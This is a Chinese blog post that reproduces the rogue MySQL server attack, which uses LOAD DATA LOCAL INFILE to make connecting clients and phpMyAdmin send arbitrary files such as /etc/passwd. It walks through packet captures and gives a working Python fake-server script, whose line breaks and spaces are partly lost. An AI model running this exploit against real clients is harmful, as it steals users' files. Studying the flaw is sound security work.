mysql协议包伪造_伪造mysql服务端实现任意读取

最新推荐文章于 2021-02-12 06:30:24 发布
最新推荐文章于 2021-02-12 06:30:24 发布
阅读量96 收藏
点赞数
文章标签: mysql协议包伪造
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35749786/article/details/113271586
版权

偶然看到大佬的一篇文章,讲利用mysql的LOAD DATA INFILE的功能读取客户端文件,觉得这个思路十分有趣,于是跟着大佬的思路复现了一遍。

0x01 LOAD DATA INFILE

LOAD DATA INFILE是我十分陌生的一种用法,作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFILE,那么就会从客户端读取一个本地文件,存入服务器端的table里。

bfd30690830e658a9909c207e16282bd.png

查看mysql官方文档,官方已经指出这种方法存在着两种潜在的问题:

fc0c44c23a2df1f737a1327bca5e73b9.png

一种是指不安全的服务端,可以伪造请求去读取客户端的任意文件。

另一种是指webserver的环境下(比如熟悉的phpmyadmin),客户端其实也就是服务端,通过load data local读入的就是服务端自己的文件,同样会造成任意文件读取。

比如在phpmyadmin里执行:

load data local infile "/etc/passwd" into TABLE test;

select * from test;

就可以直接读取任意文件了。

0x02 对mysql的抓包分析

首先先要关闭ssl,在客户端的配置文件的[mysql]节添加skip_ssl,或者关闭服务端的ssl支持。

之后在client端连接server端,进行了登陆,并执行了一次load data infil的操作,数据包如下。

4df428df09b4d91ccffce32519573f5e.png

前面先是一个greeting,是服务端向客户諯发送的握手初始化包:

118d7f8cbcadc41ff04d88df63b408cd.png

之后,客户端会发回一个登陆验证包:

ab0c0d328e5270bfc2cb221521ddaa45.png

服务端发回一个验证成功的应答:

5ec0641db90010bc330ec29a88a7f887.png

后面客户端会做一个初始化的查询:

685d7327aa2ba9eb7a1ee4d452fca01a.png

服务端的应答:

7dedaa1ba99fa3a7f88bbb8943e2c153.png

这里客户端和服务端就已经成功连接上了,接下来客户端请求load data infile。(如果无法使用LOAD DATA INFILE语法的话,考虑在连接 MySQL 的时候加上--enable-local-infile选项,或者设置local_infile全局变量为ON)

e64b76c8ef99dc65ae4c9bcc52c0ed2b.png

接下来服务端会发回一个文件确认:

056541d4f0806b4014e59a1765070dc1.png

然后客户端就把本地文件发过来了:

e03b4eea115d4dbbe65c42d8a1d0eabe.png

0x03 漏洞原理

load data的过程大概可以总结为:

客户端:hi,现在我把我的/etc/passwd文件插入test表格里

服务端:好的,把/etc/passwd文件发过来吧

客户端:好的,这是我的/etc/passwd文件

根据官方文档,客户端读取哪个文件是由服务端决定的,也就是说服务端发回哪个文件名,客户端就会读取哪个文件。

而对于这个请求,mysql并没有强制限制必须先由客户端发起load data,一个伪造的服务端可以在任何时候回复一个 file-transfer 请求,比如说最开始客户端请求初始化查询的时候。

这时的过程大概是:

客户端:hi,现在我要查询一下版本信息

服务端:好的,把/etc/passwd文件发过来吧

客户端:好的,这是我的/etc/passwd文件

0x04 服务端伪造

主要的步骤就是在本地3306端口开启一个socket,接收到连接请求后,按照顺序发送greeting,认证成功和读取文件要求。

这里我没有去分析数据包的内容,直接使用提取wireshark抓到的包。

python版:

#coding=utf-8

importsocket

importlogging

logging.basicConfig(level=logging.DEBUG)

filename="/etc/passwd"sv=socket.socket()

sv.bind(("",3306)) sv.listen(5) conn,address=sv.accept() logging.info('Conn from: %r', address) conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00") conn.recv(9999) logging.info("auth okay") conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00") conn.recv(9999) logging.info("want file...") wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename conn.sendall(wantfile) content=conn.recv(9999) logging.info(content) conn.close()

效果:

cb87415e7d95b43c368e3b48d7ac571f.png

由于我们直接发送认证成功,所以客户端用户名密码可以随便写。

在phpMyAdmin里开启远程连接(将phpMyAdmin/libraries/config.default.php的$cfg['AllowArbitraryServer']改为true):

d1cb8c84d5d1a0c7253b97377bb90ee6.png

成功:

8a5ac74aa8b375d7cabcc9443b05e556.png

这是大佬写的一个php版(同样在本地和phpmyadmin里都成功):

071b9c07855ff108dbf93e9ebb883df3.png

View Code

ps:

大佬的原脚本:https://github.com/Gifts/Rogue-MySql-Server  (只在phpMyAdmin里连接成功)

这里有个要注意的地方:

29c3538f1c90f77d4fe80310c28a16d9.png

按照大佬的说法,Capabilities这两个字节,\xf7 则表示不支持 SSL,如果不这么写会因为ssl的问题无法连接。

0x05 参考

https://blog.csdn.net/ASzhiwei/article/details/81914381

http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

https://dev.mysql.com/doc/refman/8.0/en/load-data-local.html

https://www.freebuf.com/vuls/188910.html

https://lightless.me/archives/read-mysql-client-file.html

low sapkj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql协议伪造_伪造mysql-server实现任意读取
weixin_35174422的博客
01-19 295
大概就类比于下面的对话:客户端:我想将/etc/passwd插入user表中服务端:那把/etc/passwd发给我客户端:巴拉巴拉我们所需要的做的就是搭建一个mysql服务端,然后完成上述过程,实现客户端的任意文件读取。LOAD DATA INFILE问题出在该语法上,该语法用于读取一个文件放入表中。两种用法如下:load data infile "/data/data.csv" into ta...
伪造mysql服务端
tomyyyyy
08-23 284
伪造mysql服务端 原理概述 MySQL客户端和服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客服端发送的请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求,而是直接就丢掉了,所以第二步就是根据服务端的响应来继续进行,这里服务端就可以欺骗客户端做一些事情。 但是一般的通信都是客服端发送一个MySQL语...
mysql服务端怎么实现_伪造mysql服务端实现任意读取
weixin_35600369的博客
01-21 109
偶然看到大佬的一篇文章,讲利用mysql的LOAD DATA INFILE的功能读取客户端文件,觉得这个思路十分有趣,于是跟着大佬的思路复现了一遍。0x01LOAD DATA INFILELOAD DATA INFILE是我十分陌生的一种用法,作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFILE,那么就会从客户端读取一...
伪造mysql服务端实现任意读取
dhyi38680的博客
12-16 195
  偶然看到大佬的一篇文章,讲利用mysql的LOAD DATA INFILE的功能读取客户端文件,觉得这个思路十分有趣,于是跟着大佬的思路复现了一遍。 0x01LOAD DATA INFILE   LOAD DATA INFILE是我十分陌生的一种用法,作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFIL...
网站的PHP实现技术-精品创业书模板.rar
09-17
7. 安全性:在开发过程中,必须考虑安全性问题,如SQL注入、跨站脚本攻击(XSS)和跨站请求伪造(CSRF)。PHP提供了预处理语句、过滤输入数据和验证用户请求等方法来增强应用的安全性。 8. 性能优化:优化PHP代码和...
基于springboot+netty+mybatis+hbase+kafka实现的socket server+源代码+文档说明
最新发布
11-28
- [ ] socket client接受到请求数据的命令后,从mysql读取假数据,伪造成真实设备传输的数据格式,并发送给socket server - [ ] socket server接收到返回的数据后,分别写入到hbase数据库和kafka队列中 - [ ] 最后...
java_news
03-13
在Java领域,这类系统通常采用Web开发框架如Spring Boot、Struts或Play Framework,结合数据库管理系统(如MySQL、Oracle或MongoDB)来存储和检索新闻数据。本系统的核心功能括新闻创建、编辑、分类、搜索以及用户...
skynet高并发框架教程,详细API描述
12-13
2. **转换协议实现代理**:通过协议转换实现服务间的代理。 3. **伪造消息**:模拟消息发送方的行为。 #### 节点间消息通信 1. **Multicast组播**:实现节点间的高效广播通信。 2. **Multicast介绍**:了解组播的...
天达在线
02-20
5. **RESTful API设计**:如果"天达在线"提供了移动应用接口,那么可能使用了RESTful API设计原则,使得客户端可以通过HTTP协议调用服务端接口,进行数据交换。 6. **安全防护**:考虑到电商平台的安全性,可能使用...
伪造mysql服务实现任意文件下载漏洞
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-25 1504
文章目录环境准备安装wireshark安装mysql漏洞分析利用思路原理构造 环境准备 这个问题主要是出在LOAD DATA INFILE这个语法上,这个语法主要是用于读取一个文件的内容并且放到一个表中。通常有两种用法,分别是: load data infile “/etc/passwd” into table TestTable; load data local infile “/etc/passwd” into table TestTable; 有时候也会与FIELDS TERMINATED BY '\
服务器模拟mysql协议_MySQL客户端/服务器协议
weixin_36080474的博客
02-12 162
查询的实行路径: 这个协议是半双工的,这意味着MySQL服务器在某个给定的时间,可以发送或接收数据,但是不能同时发送和接收。这也意味着没有办法截断消息。这种协议MySQL的沟通简单而又快捷,但是它也有一些限制。其中一个就是无法进行流程控制,一旦一方发送消息,另一方在发送回复之前就必须提取完整的消息。这像来回抛球的游戏:在任意时刻,只有某一方有球,而且除非有球在手上,否则就不能把球抛回去(发送消息...
Django使用mysql数据库 + CSRF跨站点请求伪造
雨神_Forrest
09-11 135
Django使用mysql数据库 1. pip install pymysql 2. 在 __init__.py 添加 import pymysql pymysql.install_as_MySQLdb() mysite/ manage.py mysite/ __init__.py settings.py urls.py wsgi.py 3. 在 settings.py中,更改DATABASES DATABAS
伪装成mysql的备_如何伪装成一个服务端开发(五)
weixin_28745067的博客
02-05 106
目录代理模式在继续之前最好先了解一下GoF中的代理模式,这里不再详细展开。代理模式的核心思想就是客户不与最终对象交互,而和一种中间代理交互,中间代理再和最终对象交互。这样的好处是,中间代理有机会干预整个交互流程。使用Proxy.newProxyInstancejava中有一种动态代理的东西,和上面代理模式中的静态代理最大的不同点就在于在编译阶段代理类的.class文件是否已经产生。动态代理是在运行...
MySQL服务端恶意读取客户端文件漏洞 (DDCTF2019和国赛均涉及到这个漏洞)
weixin_30698297的博客
05-06 538
mysql协议中流程和go语言实现的恶意mysql服务器:https://blog.csdn.net/ls1120704214/article/details/88174003 poc :https://github.com/allyshka/Rogue-MySql-Server 简单的原理:http://aq.mk/index.php/archives/23/ 今天实验了好久,直到最后一次...
客户端伪造代理服务器ip进行sql注入
free361的博客
12-16 2751
前几天同事发现网站访问异常慢,经过排查,发现mysql亚历山大。果断查看日志,发现大量这样的查看 # Query_time: 5.019276  Lock_time: 0.000066 Rows_sent: 0  Rows_examined: 1 SET timestamp=1477759063; update wa_search_record SET keyword_length= '
MySQL服务端恶意读取客户端文件漏洞分析并使用Golang编写简易蜜罐
孤城浪子的博客
03-07 3715
MySQL读取客户端文件漏洞分析并使用Golang编写简易蜜罐 一、 原理概述 这并不是一个新鲜的漏洞,我也是为了学习Golang才又拿出来炒一遍冷饭。 先大概说一下原理,MySQL客户端和服务端通信过程中是通过对话的形式来实现的,客户端发送一个操作请求,然后服务端根据客服端发送的请求来响应客户端,在这个过程中客户端如果一个操作需要两步才能完成那么当它发送完第一个请求过后并不会存储这个请求,而是直...
MySQL客户端/服务器协议详解
本文档详细介绍了MySQL客户端/服务器协议,它是MySQL数据库系统中通信的基础,对于理解MySQL如何处理分布式存储和分布式计算至关重要,特别是在使用MySQL Proxy或类似阿米巴的解决方案时。 MySQL客户端/服务器协议...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值